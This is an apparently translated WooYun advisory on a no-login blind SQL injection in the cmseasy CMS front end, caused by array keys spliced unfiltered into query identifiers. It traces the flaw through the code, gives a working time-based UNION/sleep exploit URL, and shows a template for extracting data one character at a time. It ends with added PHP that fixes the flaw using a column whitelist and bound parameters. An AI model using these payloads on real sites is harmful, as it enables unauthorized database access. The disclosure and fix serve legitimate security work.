Vulnerability summary

Defect ID: wooyun-2014-075917

Title: cmseasy front-end blind SQL injection (bypasses union, sleep and other function filtering, no login required, no defence)

Vendor: cmseasy

Author: menmen519

Submitted: 2014-09-12 15:53

Fixed: 2014-12-11 15:54

Published: 2014-12-11 15:54

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-09-12: details sent to the vendor, awaiting vendor handling
2014-09-13: vendor confirmed; details visible to the vendor only
2014-09-16: details opened to third-party security partners
2014-11-07: details opened to core white hats and domain experts
2014-11-17: details opened to regular white hats
2014-11-27: details opened to intern white hats
2014-12-11: details made public

Summary:

cmseasy front-end blind SQL injection (bypasses union, sleep and other function filtering, no login required, no defence)

Details:

archive_act.php (lines 27-33):

}
front::check_type($this->pagesize);
$announcement = new announcement();
$this->view->announcements = $announcement->getrows(null, 10);
$this->view->usergroupid = 1000;
front::check_type(cookie::get('login_username'), 'safe');
front::check_type(cookie::get('login_password'), 'safe');
// aid is taken from the request as-is; nothing here rejects an array value
$this->view->showarchive = archive::getInstance()->getrow(front::get('aid'));
$addcontentuser = new user();
$addcontentuser = $addcontentuser->getrow(array('userid' => $this->view->showarchive['userid']));


The relevant line is:
$this->view->showarchive = archive::getInstance()->getrow(front::get('aid'));
Following this into getrow():

function getrow($condition, $order = '1 desc', $cols = '*') {
// condition() rewrites $condition (passed by reference) into a WHERE fragment
$this->condition($condition);
return $this->rec_select_one($condition, '*', $order);
}


Now look at condition():

function condition(&$condition) {
if (isset($condition) && is_array($condition)) {
$_condition = array();
foreach ($condition as $key => $value) {
// note that even the value escaping is commented out
//$value=str_replace("'","\'",$value);
// $key is interpolated into the backticks verbatim: a key containing a
// backtick closes the identifier and the rest of the key becomes SQL
$_condition[] = "`$key`='$value'";
}
$condition = implode(' and ', $_condition);
}
else if (is_numeric($condition)) {
$this->getFields();
$condition = "`$this->primary_key`='$condition'";
} else if (true === $condition) {
// ... (remainder of the function is not shown in the report)


Here we see that the array keys are not filtered at all: each key is written into the backtick-quoted identifier verbatim, so a key that contains a backtick terminates the identifier and everything after it is treated as SQL. Because the parameter is read straight from the request, aid[...]=1 arrives as an array and reaches this code path. We send the following request:
URL: http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818_new/uploads/index.php?case=archive&aid[typeid%60%3d1%20UNION%20SELECT/**/1,2,3,if(1,sleep(if(1,5,1)),1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%23]=1
Capturing the query on the back end confirms that the statement executes exactly as constructed:
SELECT * FROM `cmseasy_archive` WHERE `typeid`=1 UNION SELECT/**/1,2,3,if(1,sleep(if(1,5,1)),1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58#`='1' and (state IS NULL or state<>'-1') ORDER BY 1 desc limit 1
The statement runs to completion and the page now takes 5 seconds to reload. From here, guessing a field one character at a time works as follows:
SELECT * FROM `cmseasy_archive` WHERE `typeid`=1 UNION SELECT/**/1,2,3,if(ascii(substr(user(),1,1))=$NUM,sleep(if(1,5,1)),1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58#`='1' and (state IS NULL or state<>'-1') ORDER BY 1 desc limit 1
Vary the value of $NUM; the payload must be URL-encoded.
The rest needs no explanation.
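The root cause above is a column name taken from user input and spliced into an identifier, with the value spliced in next to it. The following PHP is an added example written for this page, not cmseasy's code or its fix: readArchiveId() is a hypothetical controller-side check that refuses an array where a scalar id is expected, and buildCondition() is a safe counterpart to condition() that accepts only column names from a fixed list and hands values to the driver as bound parameters. The column list, table names and sample inputs are constructed; $allowedColumns stands in for whatever the real getFields() would return.

```php
<?php
// Added example, not cmseasy's code. Two checks that close the hole described
// above: refuse an array where the controller expects a scalar id, and build
// WHERE fragments only from a known column list, with values bound as
// parameters instead of interpolated into the statement text.
declare(strict_types=1);

// Controller side: front::get('aid') returns whatever PHP parsed from the
// query string, so aid[...]=1 arrives as an array. Accept only a digit string.
function readArchiveId(array $query): int
{
    $aid = $query['aid'] ?? null;
    if (!is_string($aid) || !ctype_digit($aid)) {
        throw new InvalidArgumentException('aid must be a positive integer');
    }
    return (int) $aid;
}

// Model side: a safe counterpart to condition(). $allowedColumns is a
// constructed list standing in for the table's real field list.
function buildCondition(array $allowedColumns, string $primaryKey, $condition): array
{
    $clauses = [];
    $params  = [];

    if (is_array($condition)) {
        foreach ($condition as $column => $value) {
            // The original emits "`$key`='$value'" with the key verbatim, so a
            // key containing a backtick rewrites the query. Comparing the key
            // against the known columns means no attacker text is ever quoted.
            if (!in_array($column, $allowedColumns, true)) {
                throw new InvalidArgumentException('unknown column: ' . var_export($column, true));
            }
            if (!is_scalar($value) && $value !== null) {
                throw new InvalidArgumentException('scalar value expected for ' . $column);
            }
            $clauses[] = "`$column` = ?";
            $params[]  = $value;
        }
        if ($clauses === []) {
            throw new InvalidArgumentException('empty condition');
        }
    } elseif (is_int($condition) || (is_string($condition) && ctype_digit($condition))) {
        // Primary-key lookup: still a placeholder, never string splicing.
        $clauses[] = "`$primaryKey` = ?";
        $params[]  = (int) $condition;
    } else {
        throw new InvalidArgumentException('unsupported condition type');
    }

    return [implode(' AND ', $clauses), $params];
}

// --- demonstration with constructed inputs ---
$archiveColumns = ['aid', 'typeid', 'userid', 'state'];

// Ordinary request: ?case=archive&aid=12
[$where, $params] = buildCondition($archiveColumns, 'aid', readArchiveId(['aid' => '12']));
echo "SELECT * FROM `cmseasy_archive` WHERE $where\n";   // `aid` = ?  with [12]

// Array lookup as used for the author record: ['userid' => 7]
[$where, $params] = buildCondition($archiveColumns, 'aid', ['userid' => 7]);
echo "SELECT * FROM `user` WHERE $where\n";              // `userid` = ?  with [7]

// The request shape from the report, aid[typeid`=1 ...]=1, is rejected at the
// controller before any SQL is assembled.
try {
    readArchiveId(['aid' => ['typeid`=1 UNION SELECT 1#' => '1']]);
} catch (InvalidArgumentException $e) {
    echo "rejected at controller: {$e->getMessage()}\n";
}

// And even if such an array reached the model, the unknown key is refused.
try {
    buildCondition($archiveColumns, 'aid', ['typeid`=1 UNION SELECT 1#' => '1']);
} catch (InvalidArgumentException $e) {
    echo "rejected at model: {$e->getMessage()}\n";
}

// Executing with PDO keeps the value out of the statement text:
//   $stmt = $pdo->prepare("SELECT * FROM `cmseasy_archive` WHERE $where");
//   $stmt->execute($params);
```

The whitelist on column names is what matters here: quoting or escaping the key would only move the problem, whereas an unknown key can simply be refused. The controller check is independent of it, and rejecting array-valued ids at the entry point also gives a clean place to log attempts of the shape shown in the report.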

Proof of concept:

Fix recommendation:

Copyright: when reproducing, credit menmen519@WooYun


Vendor response

Vendor response:

Severity: Medium

Rank: 10

Confirmed: 2014-09-13 07:58

Vendor reply:

Thanks

Latest status:

None yet